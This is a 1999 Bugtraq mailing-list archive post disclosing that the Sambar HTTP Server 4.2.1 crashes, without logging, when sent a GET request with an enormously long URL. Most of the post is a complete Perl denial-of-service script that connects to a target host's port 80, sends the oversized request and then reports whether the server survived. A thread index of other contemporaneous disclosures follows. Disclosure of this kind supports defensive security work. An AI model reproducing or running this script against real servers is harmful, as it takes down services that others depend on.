Bugtraq mailing list archives
(no subject)
From: dennis () LINUXSTART COM (Dennis Conrad)
Date: Mon, 4 Oct 1999 00:58:40 -0000
While testing the security of the Sambar HTTP-Server I found it vulnerable to a simple DOS attack. Sending a "GET XXXX(...a lot of Xs..)XXXX HTTP/1.0" crashes the Server. It will die WITHOUT logging the attack. My testing-environment: Sambar 4.2.1 M$IE 5.0 (de) Windows 95 C (de) Sample exploit code follows. Dennis Conrad (dennis () linuxstart com) -------------------- #!/usr/bin/perl ######### # Sample DOS against the Sambar HTTP-Server # This was tested against Sambar 4.2.1 running on Windows95 C # This attack will NOT be logged! Only use it to determine if # your Server is vulnerable! # # Dennis Conrad (dennis () linuxstart com) # use IO::Socket; print "+++++++++\n"; print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n"; print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n"; if ($#ARGV != 0) { die "+ Please give the host address as argument\n" } opensocket ("\n"); print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n"; close $remote; opensocket ("\n+ The server seemed to be vulnerable to this attack\n"); close $remote; die "+ The server does not seem to be vulnerable to this attack\n"; sub opensocket { $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ARGV[0], PeerPort => "http(80)", ) || die "+ Can't open http-port on $ARGV[0]$_[0]"; $remote->autoflush(1) } # EOF -------------------- ------ Do you do Linux? :) Get your FREE @linuxstart.com email address at: http://www.linuxstart.com
Current thread:
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Eric Griffis (Sep 30)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Dan Astoorian (Oct 01)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Jeff Long (Oct 04)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Valdis.Kletnieks () VT EDU (Oct 01)
- Team Asylum: iHTML Merchant (Follow-up) Team Asylum (Oct 01)
- RFP9903: AeDebug vulnerability .rain.forest.puppy. (Oct 01)
- Re: RFP9903: AeDebug vulnerability Matt (Oct 04)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Pavel Kankovsky (Oct 02)
- Buffer Overflows and Remote Root Exploits Crispin Cowan (Oct 02)
- (no subject) Dennis Conrad (Oct 03)
- Re: Sample DOS against the Sambar HTTP-Server Steve (Oct 06)
- Re: Sample DOS against the Sambar HTTP-Server Dennis Conrad (Oct 08)
- Re: Sample DOS against the Sambar HTTP-Server syz (Oct 09)
- Re: Sample DOS against the Sambar HTTP-Server Steve (Oct 06)
- <Possible follow-ups>
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Dan Astoorian (Sep 30)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Casper Dik (Oct 01)
- RFP9904: TeamTrack webserver vulnerability .rain.forest.puppy. (Oct 02)
- Fix for ssh-1.2.27 symlink/bind problem Scott Gifford (Oct 02)
- Re: Fix for ssh-1.2.27 symlink/bind problem Eivind Eklund (Oct 04)
- Re: Fix for ssh-1.2.27 symlink/bind problem Toomas Kiisk (Oct 05)
- Re: Fix for ssh-1.2.27 symlink/bind problem Olaf Seibert (Oct 04)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Dan Astoorian (Oct 01)